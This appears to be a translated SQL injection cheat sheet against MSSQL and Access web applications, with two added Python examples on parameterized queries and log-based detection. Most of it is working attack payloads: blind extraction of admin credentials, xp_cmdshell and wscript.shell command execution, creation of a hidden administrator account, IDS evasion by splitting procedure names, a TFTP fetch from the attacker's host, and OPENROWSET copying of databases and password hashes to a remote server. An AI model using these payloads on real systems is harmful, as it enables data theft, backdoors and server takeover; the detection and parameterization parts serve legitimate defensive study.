1. Judge whether there is an injection point.
; and 1=1 and 1=2
2. Guess the table name. Common table names are nothing more than admin, adminuser, user, pass, password, etc.
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin)  -- determines whether the admin table exists
3. Guess the number of accounts: if 0<(count) returns the correct page and 1<(count) returns the error page, there is exactly one account.
4. Guess the field names: put the field name you have in mind inside len().
and 1=(select count(*) from admin where len(name)>0)  -- user field name
and 1=(select count(*) from admin where len(password)>0)  -- password field name
5. Guess the length of each field.
To guess the length, keep changing the >0 bound until the correct page is returned.
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)  -- error
and 1=(select count(*) from admin where len(name)>5)  -- correct; the length is 6
and 1=(select count(*) from admin where len(name)=6)  -- correct
and 1=(select count(*) from admin where len(password)>11)  -- correct
and 1=(select count(*) from admin where len(password)>12)  -- error; the length is 12
and 1=(select count(*) from admin where len(password)=12)  -- correct
6. Guess the characters
and 1=(select count(*) from admin where left(name,1)='a')  -- guess the first character of the user account
and 1=(select count(*) from admin where left(name,2)='ab')  -- guess the second character of the user account
Keep adding one character at a time; once you have guessed as many characters as the length found above, the account is out.
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51)--
This query can guess Chinese user names and passwords too: just replace the number with the character's code, and at the end convert the results back into characters.
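The blind-probing procedure of steps 1, 5 and 6, as an added example that is not part of the original cheat sheet: it runs the same probes against a query built by string concatenation and then against the parameterized form of the same query. The admin table and its single row are constructed, the database is an in-memory SQLite (so length() and substr() stand in for the len() and left() of the page's MSSQL/Access payloads), and the lookup functions, probe functions and charset are names chosen here, not anything from the page.

```python
"""Boolean-blind probing (steps 1, 5 and 6 of this page) against a query built by
string concatenation, and the same probes against a parameterized query.

Added illustration, not part of the original cheat sheet. Uses an in-memory SQLite
database with a constructed admin table; SQLite's length() and substr() stand in
for the len() and left() functions used in the page's MSSQL/Access payloads.
"""
import sqlite3


def make_db():
    # Constructed sample data: one admin row and one news row.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (id integer, name text, password text)")
    conn.execute("insert into admin values (1, 'tester', 'Passw0rd2004')")
    conn.execute("create table news (id integer, title text)")
    conn.execute("insert into news values (1, 'hello')")
    return conn


def vulnerable_lookup(conn, news_id):
    """The page's 'SELECT * FROM news WHERE id=...' with the id concatenated in.
    True means the page would render normally; False means no rows or an error."""
    try:
        return conn.execute("select * from news where id=" + news_id).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_lookup(conn, news_id):
    """Same lookup with the id bound as a parameter: the input is a value, never SQL."""
    try:
        return conn.execute("select * from news where id=?", (news_id,)).fetchone() is not None
    except sqlite3.Error:
        return False


def oracle_present(conn, lookup):
    """Step 1: an injection point exists when 'and 1=1' and 'and 1=2' render differently."""
    return bool(lookup(conn, "1 and 1=1")) and not lookup(conn, "1 and 1=2")


def probe_length(conn, lookup, column, max_len=64):
    """Step 5: raise the '>n' bound until the page flips; the flip point is the length."""
    if not oracle_present(conn, lookup):
        return None
    for n in range(max_len):
        payload = f"1 and 1=(select count(*) from admin where length({column})>{n})"
        if not lookup(conn, payload):
            return n
    return None


def probe_value(conn, lookup, column, length, charset="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Step 6: extend the guessed prefix one character at a time."""
    if not oracle_present(conn, lookup):
        return None
    found = ""
    for _ in range(length):
        for ch in charset:
            guess = found + ch
            payload = (f"1 and 1=(select count(*) from admin "
                       f"where substr({column},1,{len(guess)})='{guess}')")
            if lookup(conn, payload):
                found = guess
                break
        else:
            return None  # next character is outside the charset
    return found


if __name__ == "__main__":
    db = make_db()
    for label, lookup in (("concatenated", vulnerable_lookup), ("parameterized", safe_lookup)):
        n = probe_length(db, lookup, "name")
        value = probe_value(db, lookup, "name", n) if n else None
        print(label, "oracle:", oracle_present(db, lookup), "length:", n, "value:", value)
```

The parameterized lookup never satisfies the step-1 check, because the whole string is bound as the value of id and is never parsed as SQL, so every later probe has nothing to measure. That binding, rather than filtering the words "and" or "select", is the property to verify when reviewing code that follows the pattern on this page.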
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values(666, 'attacker', 'foobar', 0xffff)--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id', 'login_name')--
UNION SELECT TOP 1 login_name FROM logintable--
UNION SELECT TOP 1 password FROM logintable WHERE login_name='Rahul'--
Check the server's patch level (an error means SP4 is installed):
and 1=(select @@version)--
Check the permissions of the database connection account: a normal page proves it holds the sysadmin server role.
and 1=(select is_srvrolemember('sysadmin'))--
Determine the database connection account (connecting as sa: a normal page proves the connection account is sa).
and 'sa'=(select system_user)--
and user_name()='dbo'--
and 0<>(select user_name())--
Check whether xp_cmdshell has been deleted:
and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')--
If xp_cmdshell was deleted it can be restored, and restoring from an absolute path is supported:
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'--
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'c:\inetpub\wwwroot\xplog70.dll'--
Reverse PING experiment (ping your own host):
; use master; declare @s int; exec sp_oacreate 'wscript.shell', @s out; exec sp_oamethod @s, 'run', NULL, 'cmd.exe /c ping 192.168.0.1';--
Add an account:
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
Create a virtual directory pointing at drive E:
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "e","e:\"'--
Access attributes (combined with writing a webshell):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
Dumping the database
Special tip: %5c = \ ; or submit / and \ changed into %5c.
and 0<>(select top 1 paths from newtable)--
Get the database name (dbid 1 to 5 are all system databases; only dbid 6 and above can be judged):
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = 7, 8, 9, ... in turn to get more database names.
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')  -- dumps one table; assume it is admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('admin'))  -- to get the other tables
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))  -- dumps the uid; assume it is 18779569 (uid=id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)  -- gets one field of admin; assume it is user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id', ...))  -- to dump the other fields
and 0<(select user_id from bbs.dbo.admin where username>1)  -- gets the user name
The password can be obtained the same way..... assuming fields such as user_id, username and password exist.
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')  -- get the table name
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=77357794)
id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin  (union also works on Access)
Get the web path:
; create table [dbo].[swap]([swappass][char](255));--
and (select top 1 swappass from swap)=1--
; create table newtable(id int identity(1,1), paths varchar(500)) declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test output insert into newtable(paths) values(@test)--
; use ku1;--
; create table cmd (str image);--  create a table cmd of type image
Test procedure when xp_cmdshell exists:
; exec master..xp_cmdshell 'dir'
; exec master.dbo.sp_addlogin 'jiaoniang$';--  add a SQL account
; exec master.dbo.sp_password null, '1866574', 'jiaoniang$';--
; exec master.dbo.sp_addsrvrolemember 'jiaoniang$', 'sysadmin'--
; exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
; exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
exec master..xp_servicecontrol 'start', 'schedule'  -- start a service
exec master..xp_servicecontrol 'start', 'server'
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'
; exec master..xp_cmdshell 'tftp -i youip get file.exe'--  use TFTP to upload a file
; declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
; declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
; declare @a sysname; set @a=db_name(); backup database @a to disk='\\your IP\your *** directory\bak.dat'
If you are restricted, you can use:
select * from openrowset('sqloledb', 'server';'sa';'', 'select ''OK!'' exec master.dbo.sp_addlogin hax')
Query structure:
SELECT * FROM news WHERE id=... AND topic=... AND .....
admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass<>'
select 123;--
; use master;--
: a' or name like 'fff%';--  shows there is a user named ffff
and 1<>(select count(email) from [user]);--
; update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
; update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
; update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
; update [users] set email=(select top 1 count(id) from password) where name='ffff';--
; update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
; update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
The statements above fetch the first user table in the database and put its name into the email field of user ffff.
By viewing ffff's user profile you obtain the first table, called ad.
Then, from the table name ad, get that table's id and the name of the second table.
insert into users values(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values(667, 123, 123, 0xffff)--
insert into users values(123, 'admin--', 'password', 0xffff)--
; and user>0
; and (select count(*) from sysobjects)>0
; and (select count(*) from msysobjects)>0  // this is an Access database
Enumerate the data table names:
; update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
This updates the first table name into the aaa field.
Read out the first table; the second table can be read the same way (append "and name<>'the table name just obtained'" to the condition):
; update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--
Then id=1552 and exists(select * from aaa where aaa>5)
Read out the second table, and so on one at a time, until there are no more.
Read the fields like this:
; update aaa set aaa=(select top 1 col_name(object_id('table name'),1));--
Then id=152 and exists(select * from aaa where aaa>5) errors and gives the field name.
; update aaa set aaa=(select top 1 col_name(object_id('table name'),2));--
Then id=152 and exists(select * from aaa where aaa>5) errors and gives the field name.
[Get the table name] [Update a field's value to the table name, then find a way to read that field's value to obtain the table name]
update <table name> set <field>=(select top 1 name from sysobjects where xtype='u' and status>0 [and name<>'<table name already obtained>', adding one each time you find one]) [where <condition>]
select top 1 name from sysobjects where xtype='u' and status>0 and name not in ('table1', 'table2', …)
Creating a database administrator account and a system administrator account through the injection vulnerability [the current account must be in the SYSADMIN group]
[Get the field names of a data table] [Update a field's value to the field name, then find a way to read that field's value to obtain the field name]
update <table name> set <field>=(select top 1 col_name(object_id('<data table to query>'), <column number, e.g. 1>)) [where <condition>]
Bypass IDS detection [using variables]:
; declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
; declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
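An added detection example, not from the original page, covering the payload families this cheat sheet uses; it sits here because the "variable" bypass above defeats naive matching on the literal string xp_cmdshell. The normalizer URL-decodes the request (twice, for double encoding) and collapses the 'xp_'+'cmdshell' and xp_+cmdshell splits before the signatures run. The log lines, client addresses, signature names and function names are constructed for this example; only the procedure and function names inside the patterns are the page's.

```python
"""Signature detection for the MSSQL injection payload families catalogued on this
page, with normalization for the 'variable' trick ('xp_'+'cmdshell') used to evade
IDS matching.

Added illustration, not part of the original cheat sheet. The log lines are
constructed in combined-log format; only the request path is inspected.
"""
import re
from urllib.parse import unquote, unquote_plus

SIGNATURES = {
    "boolean-probe": re.compile(r"\band\s+\d+\s*(?:<>|<|>|=)\s*\(?\s*(?:\d+|select\b)", re.I),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "catalog-read": re.compile(r"\b(?:sysobjects|syscolumns|sysdatabases|sysxlogins|information_schema)\b", re.I),
    "command-exec": re.compile(r"\b(?:xp_cmdshell|sp_oacreate|sp_oamethod|xp_regread|xp_dirtree|"
                               r"xp_subdirs|xp_availablemedia|xp_servicecontrol|sp_addextendedproc)\b", re.I),
    "remote-query": re.compile(r"\bopenrowset\s*\(", re.I),
    "priv-check": re.compile(r"\b(?:is_srvrolemember|is_member|user_name)\s*\(|\bsystem_user\b", re.I),
    "account-change": re.compile(r"\b(?:sp_addlogin|sp_addsrvrolemember|sp_password|net\s+user|net\s+localgroup)\b", re.I),
    "backup-to-web": re.compile(r"\bbackup\s+database\b", re.I),
}

# client, ident, user, [timestamp], "METHOD path ..."
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

# Constructed sample log lines (not real traffic).
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2005:10:01:02 +0800] "GET /news.asp?id=12 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [12/Mar/2005:10:01:07 +0800] "GET /news.asp?id=12%20and%201=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [12/Mar/2005:10:01:09 +0800] "GET /news.asp?id=12%20and%201=2 HTTP/1.1" 200 412',
    '10.0.0.9 - - [12/Mar/2005:10:02:30 +0800] "GET /news.asp?id=12%20and%200%3C%3E(select%20top%201%20name'
    '%20from%20bbs.dbo.sysobjects%20where%20xtype=%27U%27) HTTP/1.1" 500 730',
    '10.0.0.9 - - [12/Mar/2005:10:05:11 +0800] "GET /news.asp?id=12;declare%20@a%20sysname%20set%20@a='
    '%27xp_%27%2B%27cmdshell%27%20exec%20@a%20%27dir%20c:%5C%27-- HTTP/1.1" 500 730',
    '10.0.0.9 - - [12/Mar/2005:10:06:40 +0800] "GET /news.asp?id=-1%20union%20select%201,2,3,*%20from%20admin-- HTTP/1.1" 500 730',
]


def normalize(path):
    """Decode once as a query string (+ is a space, %2B is a literal +), once more for
    double encoding, then undo string splitting: 'xp_'+'cmdshell' and xp_+cmdshell
    both become xp_cmdshell so the signatures see the procedure name."""
    s = unquote(unquote_plus(path))
    s = re.sub(r"'\s*\+\s*'", "", s)          # 'xp_'+'cmdshell' -> 'xp_cmdshell'
    s = re.sub(r"(?<=\w)\+(?=\w)", "", s)      # xp_+cmdshell    -> xp_cmdshell
    return re.sub(r"\s+", " ", s)


def classify(path):
    """Return the names of every signature family that matches the normalized path."""
    s = normalize(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(s)]


def scan(lines):
    """Return (client, decoded path, tags) for every request that matches a signature."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        tags = classify(m.group(2))
        if tags:
            hits.append((m.group(1), normalize(m.group(2)), tags))
    return hits


if __name__ == "__main__":
    for client, path, tags in scan(LOG_LINES):
        print(client, tags, path)
```

This is a triage filter, not a WAF: a legitimate request can contain "and 1=1", so hits should be grouped per client and reviewed, and payloads encoded in ways the page does not show (char() sequences, comments between tokens) need further normalization rules. The point of the normalize step is that it reflects the evasion the page itself documents.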
1. Open the remote database.
Basic syntax:
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1')
Parameters: (1) OLEDB provider name
2. The connection string parameter can use any port for the connection, for example:
select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table')
3. Copy the entire database of the target host: insert all remote tables into local tables.
Basic syntax:
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1') select * from table2
This statement copies all the data in table2 on the target host into table1 in the remote database. In practice, adjust the IP address and port in the connection string so it points where needed, for example:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table1') select * from table2
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from _sysdatabases') select * from master.dbo.sysdatabases
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from _sysobjects') select * from user_database.dbo.sysobjects
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from _syscolumns') select * from user_database.dbo.syscolumns
Copy the database:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table1') select * from database..table1
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table2') select * from database..table2
Copy the hash table: the login password hashes are stored in sysxlogins. The method is as follows:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins
Once you have the hashes you can brute-force them.
Directory traversal method: first create a temporary table, temp:
; create table temp(id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
; insert temp exec master.dbo.xp_availablemedia;--  get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--  get the subdirectory list
; insert into temp(id, num1) exec master.dbo.xp_dirtree 'c:\';--  get the directory tree of all subdirectories and insert it into the temporary table
; insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--  view the contents of a file
; insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
; insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
; insert into temp(id) exec master.dbo.xp_cmdshell 'cscript c:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'
; insert into temp(id, num1) exec master.dbo.xp_dirtree 'c:\';--  (xp_dirtree works with the public permission)
Write to table:
Statement 1: and 1=(select is_srvrolemember('sysadmin'));--
Statement 2: and 1=(select is_srvrolemember('serveradmin'));--
Statement 3: and 1=(select is_srvrolemember('setupadmin'));--
Statement 4: and 1=(select is_srvrolemember('securityadmin'));--
Statement 5: and 1=(select is_srvrolemember('securityadmin'));--
Statement 6: and 1=(select is_srvrolemember('diskadmin'));--
Statement 7: and 1=(select is_srvrolemember('bulkadmin'));--
Statement 8: and 1=(select is_srvrolemember('bulkadmin'));--
Statement 9: and 1=(select is_member('db_owner'));--
Write the paths into a table:
; create table dirs(paths varchar(100), id int)--
; insert dirs exec master.dbo.xp_dirtree 'c:\'--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in ('@Inetpub'))--
; create table dirs1(paths varchar(100), id int)
; insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--
and 0<>(select top 1 paths from dirs1)--
Back up the database into the web directory, then download it:
; declare @a sysname; set @a=db_name(); backup database @a to disk='e:\web\down.bak';--
and 1=(select top 1 name from (select top 12 id, name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(select top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects)  -- see the relevant table
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)
-=- wscript.shell example -=-
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
  print @line
  exec @ret = sp_oamethod @f, 'readline', @line out
end
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers belong to us', 528
waitfor delay '00:00:05'
; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers belong to us', 528 waitfor delay '00:00:05'--
xp_dirtree works with the public permission:
exec master.dbo.xp_dirtree 'c:\'
The information returned has two fields, subdirectory and depth. subdirectory is a character field and depth is an integer field.
create table dirs(paths varchar(100), id int)
Build a table. The table built here corresponds to xp_dirtree above: the same number of fields, with the same types.
insert dirs exec master.dbo.xp_dirtree 'c:\'
As long as the table we build matches the fields returned by the stored procedure, the insert runs: that is how results get written into a table, and step by step we reach the information we want.